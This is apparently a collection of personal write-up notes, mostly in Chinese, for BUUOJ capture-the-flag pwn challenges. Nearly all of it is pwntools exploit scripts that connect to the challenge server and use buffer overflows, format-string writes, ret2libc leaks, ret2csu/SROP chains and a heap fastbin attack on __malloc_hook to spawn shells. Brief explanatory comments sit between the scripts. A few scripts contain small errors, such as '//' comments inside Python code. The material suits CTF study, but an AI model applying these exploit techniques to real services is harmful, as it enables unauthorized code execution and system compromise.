test_your_nc
pw@pwn:~/Desktop$ nc node4.buuoj.cn 29381
cat f*
flag{80bfa2c9-25ff-4f51-9376-61ee8f577d02}
rip
如果是recvuntil("please input")会时间超时;因为此题出的比较草率,没有考虑关闭缓冲区,"please input"加入缓冲区之后并没有满,因此继续留在缓冲区即程序并没有输出出来,所以根本就收不到payload,自然就会超时
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",27963)
payload = b'a'*(0xf+8)+p64(0x401186)
p.sendline(payload)
p.interactive()
warmup_csaw_2016
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",26496)
payload = b'a'*0x48+p64(0x40060d)
p.sendline(payload)
p.interactive()
ciscn_2019_n_1
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",25088)
payload = b'a'*0x38+p64(0x4006BE)
p.sendline(payload)
p.interactive()
pwn1_sctf_2016
from pwn import *
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",25080)
payload = b'I'*20+b'aaaa'+p32(0x8048F0D)
p.sendline(payload)
p.interactive()
jarvisoj_level0
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",28851)
payload = b'a'*0x88+p64(0x400596)
p.sendline(payload)
p.interactive()
[第五空间2019 决赛]PWN5
from pwn import *
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",25223)
payload = p32(0x804C044)+b"%10$n"
p.sendlineafter("your name:",payload)
p.sendline(b'4')
p.interactive()
答案不唯一,也可以用%s泄露地址上的值等等
ciscn_2019_c_1
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",28882)
p.sendlineafter("Input your choice!\n",b'1')
ret = 0x00000000004006b9
rdi = 0x0000000000400c83
elf = ELF('./ciscn_2019_c_1')
libc = ELF('./libc-2.27.so')
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
encrypt = elf.symbols['encrypt']
payload = b'a'*0x58 + p64(rdi) +p64(puts_got) +p64(puts_plt) +p64(encrypt)
p.sendlineafter("Input your Plaintext to be encrypted\n",payload)
puts = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
libc_base = puts - libc.symbols['puts']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
payload = b'a'*0x58 + p64(ret)+ p64(rdi) +p64(binsh) +p64(system)
p.sendlineafter("Input your Plaintext to be encrypted\n",payload)
p.interactive()
ciscn_2019_n_8
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",25108)
p.sendline(b"aaaa"*13 + p64(0x11))
p.interactive()
qword全称是Quad Word。2个字节就是1个Word(1个字,16位),q就是英文quad-这个词根(意思是4)的首字母,所以它自然是word(2字节,0~2^16-1)的四倍,8字节
jarvisoj_level2
from pwn import *
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",26152)
payload = b'a'*(0x88+4)+p32(0x8048320)+p32(1)+p32(0x804A024)
p.sendline(payload)
p.interactive()
bjdctf_2020_babystack
from pwn import *
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",25465)
p.sendlineafter("name:\n",b'9999')
payload = b'a'*0x18 +p64(0x4006E6)
p.sendlineafter("?\n",payload)
p.interactive()
get_started_3dsctf_2016
from pwn import *
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",27759)
elf = ELF('./g')
exit_addr = elf.symbols['exit']
payload = b'a'*0x38 +p32(0x80489A0)+p32(exit_addr)+p32(0x308CD64F)+p32(0x195719D1)
p.sendline(payload)
print(p.recv())
(1):没有push ebp ,
(2 ):程序如果没有从exit(0)退出,程序不能够回显
jarvisoj_level2_x64
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",28789)
payload = b'a'*0x88 +p64(0x00000000004006b3)+p64(0x600A90)+p64(0x4004c0)
p.sendlineafter("Input:\n",payload)
p.interactive()
[OGeek2019]babyrop
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",25703)
elf = ELF('./i')
libc = ELF('./libc-2.23-32')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
payload = b"\x00" +b'\xff'*7
p.sendline(payload)
payload = b'a'*(0xe7+4)+p32(puts_plt)+p32(0x80487D0)+p32(puts_got)+p32(0xff)
p.sendline(payload)
p.recvline()
puts = u32(p.recv(4))
print(hex(puts))
libc_base = puts - libc.symbols['puts']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
payload = b'a'*(0xe7+4)+p32(system)+p32(0)+p32(binsh)
p.sendline(payload)
p.interactive()
read遇到‘\x00’还会接受后面的字符
[HarekazeCTF2019]baby_rop
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",27901)
payload = b'b'*0x18 +p64(0x400479)+p64(0x400683)+p64(0x601048)+p64(0x400490)
p.sendline(payload)
p.interactive()
ciscn_2019_en_2
和ciscn_2019_c_1一样,
ciscn_2019_n_5
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",26076)
shellcode = asm(shellcraft.sh())
p.sendlineafter("tell me your name\n",shellcode)
payload = b'a'*0x28 +p64(0x601080)
p.sendlineafter("What do you want to say to me?\n",payload)
p.interactive()
not_the_same_3dsctf_2016
from pwn import *
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",29524)
elf = ELF('./c')
write = elf.sym['write']
exit = elf.sym['exit']
payload = b'a'*0x2d+p32(0x080489A0)+p32(write)+p32(exit)+p32(1)+p32(0x080ECA2D)+p32(45)
p.sendline(payload)
p.interactive()
others_shellcode
nc即可
ciscn_2019_ne_5
from pwn import *
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",28690)
p.sendlineafter(":",b"administrator")
p.sendlineafter(":",b"1")
payload = b'a'*(0x48+4)+p32(0x80484d0)+p32(0x80484e0)+p32(0x080482ea)
p.sendlineafter("info:",payload)
p.sendlineafter(":",b"4")
p.interactive()
铁人三项(第五赛区)_2018_rop
from pwn import *
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",28930)
elf = ELF('./f')
libc= ELF('./libc-2.27-23')
write_plt = elf.plt['write']
write_got = elf.got['write']
vulnerable_function = elf.sym['vulnerable_function']
payload = b'a'*0x8c +p32(write_plt)+p32(vulnerable_function)+p32(1)+p32(write_got)+p32(0x30)
p.sendline(payload)
write = u32(p.recv(4))
print(hex(write))
libc_base = write - libc.symbols['write']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
payload = b'a'*0x8c +p32(system)+p32(0)+p32(binsh)
p.sendline(payload)
p.interactive()
bjdctf_2020_babyrop
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",29257)
elf = ELF('./g')
libc= ELF('./libc-2.23-64')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
rdi = 0x400733
vuln = elf.sym['vuln']
payload = b'a'*0x28 +p64(rdi)+p64(puts_got)+p64(puts_plt)+p64(vuln)
p.sendline(payload)
puts = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(puts))
libc_base = puts - libc.symbols['puts']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
payload = b'a'*0x28 +p64(rdi)+p64(binsh)+p64(system)
p.sendline(payload)
p.interactive()
bjdctf_2020_babystack2
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",25117)
p.sendlineafter(':\n',b'-1')
payload = b'z'*0x18 +p64(0x400726)
p.sendlineafter("?\n",payload)
p.interactive()
jarvisoj_fm
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",27004)
payload = p32(0x804A02C) + b"%11$n"
p.sendline(payload)
p.interactive()
ciscn_2019_es_2
from pwn import *
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",27445)
leave_ret = 0x080484b8
p.sendafter("?\n",b'a'*0x28)
p.recvuntil(b'a'*0x28)
old_ebp = u32(p.recv(4))
print(hex(old_ebp))
payload = b'a'*4 +p32(0x8048400)+p32(0)+p32(old_ebp-0x28)+b'/bin/sh\x00'
payload = payload.ljust(0x28,b'a') + p32(old_ebp-0x38)+p32(leave_ret)
p.send(payload)
p.interactive()
leave : mov ebp esp pop ebp
ret : pop eip
jarvisoj_tell_me_something
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",29032)
payload = b'a'*0x88 +p64(0x400620)
p.sendlineafter(":\n",payload)
p.interactive()
没有push rsp
[HarekazeCTF2019]baby_rop2
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",29750)
libc = ELF('./libc-2.23-64')
elf =ELF('./h')
rdi = 0x400733
rsi_r15 = 0x400731
main = elf.sym['main']
printf_plt = elf.plt['printf']
printf_got = elf.got['read']
payload = b'a'*0x28 +p64(rdi) +p64(0x400790) +p64(rsi_r15)+p64(printf_got)+p64(0) +p64(printf_plt)+p64(main)
p.sendlineafter('? ',payload)
read = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))
print(hex(read))
libc_base = read - libc.symbols['read']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
payload = b'a'*0x28 + p64(rdi) +p64(binsh)+p64(system)
p.sendlineafter('? ',payload)
p.interactive()
有点坑,printf_got 没有成功,不知道为什么?
pwn2_sctf_2016
from pwn import *
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",25073)
libc = ELF('./libc-2.23-32')
elf =ELF('./a')
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
vuln = elf.sym['vuln']
p.sendlineafter("? ",b'-1')
payload = b'a'*0x30 +p32(printf_plt)+p32(vuln) +p32(printf_got)
p.sendlineafter("data!\n",payload)
p.recv()
printf = u32(p.recv(4))
print(hex(printf))
libc_base = printf - libc.symbols['printf']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
p.sendlineafter("? ",b'-1')
payload = b'a'*0x30 +p32(system)+p32(0x1223344)+p32(binsh)
p.sendlineafter("data!\n",payload)
p.interactive()
有点意思的是程序用的是getchar()函数,遇到"\x00"就会截止,所以在第三十七行的放回地址不能有“\x00”,不然接受不到binsh就截至了
但是read居然接受"\x00"没有截止
jarvisoj_level3(ret2libc)
from pwn import *
context(os='linux', arch='i386', log_level='debug')
p = remote("node4.buuoj.cn",28898)
libc = ELF('./libc-2.23-32')
elf =ELF('./b')
write_plt = elf.plt['write']
write_got = elf.got['read']
vuln = elf.sym['vulnerable_function']
payload = b'a'*0x8c +p32(write_plt)+p32(vuln) +p32(1)+p32(write_got)+p32(0x20)
p.sendlineafter("Input:\n",payload)
printf = u32(p.recv(4))
print(hex(printf))
libc_base = printf - libc.symbols['read']
system = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))
payload = b'a'*0x8c +p32(system)+p32(0x1223344)+p32(binsh)
p.sendlineafter("Input:\n",payload)
p.interactive()
ciscn_2019_s_3(ret2scu,SROP)
from pwn import *
io = remote("node4.buuoj.cn",29843)
elf = ELF('./c')
context.log_level = 'debug'
csu_rear = 0x40059A
csu_front = 0x400580
vuln_addr = elf.sym['vuln']
rdi = 0x4005A3
execve_ret = 0x04004E2
syscall = 0x0400517
payload_leak = ( b'/bin/sh\x00') + ( b'A' * 8 ) + p64(vuln_addr)
io.sendline(payload_leak)
recv = io.recv(0x20)
stack_addr = u64(io.recv(8))
binsh_addr = stack_addr - 0x118
execve = binsh_addr + 0x10
def csu( rbx , rbp , r12 , r13 , r14 , r15 ):
payload = b'/bin/sh\x00' + b'A'*0x8 + p64(execve_ret)
payload += p64(csu_rear)
payload += p64(rbx) + p64(rbp) + p64(r12) + p64(r13) + p64(r14) + p64(r15)
payload += p64(csu_front)
payload += b'A' * 0x38
payload += p64(rdi)
payload += p64(binsh_addr)
payload += p64(syscall)
io.send(payload)
csu( 0 , 1 , execve , 0 , 0 , 0 )
io.interactive()
为什么execve = binsh_addr + 0x10 要加0x10 因为binsh_addr + 0x10是mov eax 0x3b 放到r12上去call
https://www.cnblogs.com/bhxdn/p/12715671.html
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",29843)
elf = ELF('./c')
vuln = elf.sym['vuln']
mov_eax = 0x4004DA
rdi =0x4005a3
syscall = 0x400517
payload = b'/bin/sh\00'*2+p64(vuln)
p.sendline(payload)
recv =p.recv(0x20)
binsh = u64(p.recv(8))
binsh = binsh - 0x118
print(hex(binsh))
frame = SigreturnFrame()
frame.rax = 0x3b
frame.rdi = binsh
frame.rsi = 0
frame.rdx = 0
frame.rip = syscall
payload ='/bin/sh\x00' +p64(0) +p64(mov_eax)+p64(syscall)+str(frame)
p.sendline(payload)
p.interactive()
还是SROP简单些
picoctf_2018_rop chain
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p = remote("node4.buuoj.cn",26156)
payload = b'a'*0x1c+p32(0x80485CB)+p32(0x080485D8)+p32(0x0804862B)+p32(0xBAAAAAAD)+p32(0xDEADBAAD)
p.sendline(payload)
p.interactive()
babyheap_0ctf_2017
from pwn import *
context(os='linux', arch='amd64', log_level='debug')
p =process('./a')
libc =ELF('/home/pw/pwn_tools/glibc-all-in-one/libs/2.23-0ubuntu3_amd64/libc-2.23.so')
def d():
gdb.attach(p)
pause()
def add(size):
p.sendlineafter(": ",b'1')
p.sendlineafter(": ",str(size))
def edit(index,content):
p.sendlineafter(": ",b'2')
p.sendlineafter(": ",str(index))
p.sendlineafter(": ",str(len(content)))
p.sendlineafter("Content: ",content)
def free(index):
p.sendlineafter(": ",b'3')
p.sendlineafter(": ",str(index))
def show(index):
p.sendlineafter(": ",b'4')
p.sendlineafter(":",str(index))
add(0x80) #0
add(0x80) #1
add(0x80) #2
add(0x80) #3
free(1)
edit(0,b'a'*0x88+p64(0x121))
add(0x110)
edit(1,b'a'*0x88+p64(0x91))
free(2)
show(1)
unsortbin = u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))
print(hex(unsortbin))
malloc_hook = unsortbin -0x58 -0x10
print(hex(malloc_hook))
libc_base = malloc_hook - libc.symbols['__malloc_hook']
execve = libc_base + 0x4525a
add(0x80) #2
add(0x10) #4
add(0x60) #5 //只能是0x59到0x68之间,这里大小将决定fake堆的大小
free(5)
edit(4,b'a'*0x18+p64(0x61)+p64(malloc_hook-0x23))//malloc_hook-0x23的size为0x7f
add(0x60) #5
add(0x60) #6
edit(6,b'a'*0x13+p64(execve))
add(0x10)
p.interactive()
malloc ==> __malloc_hook ==> addr...
unsortbin_addr = main_arena + 0x58
main_arena = __malloc_hook +0x10
__malloc_hook = unsortbin -0x58 -0x10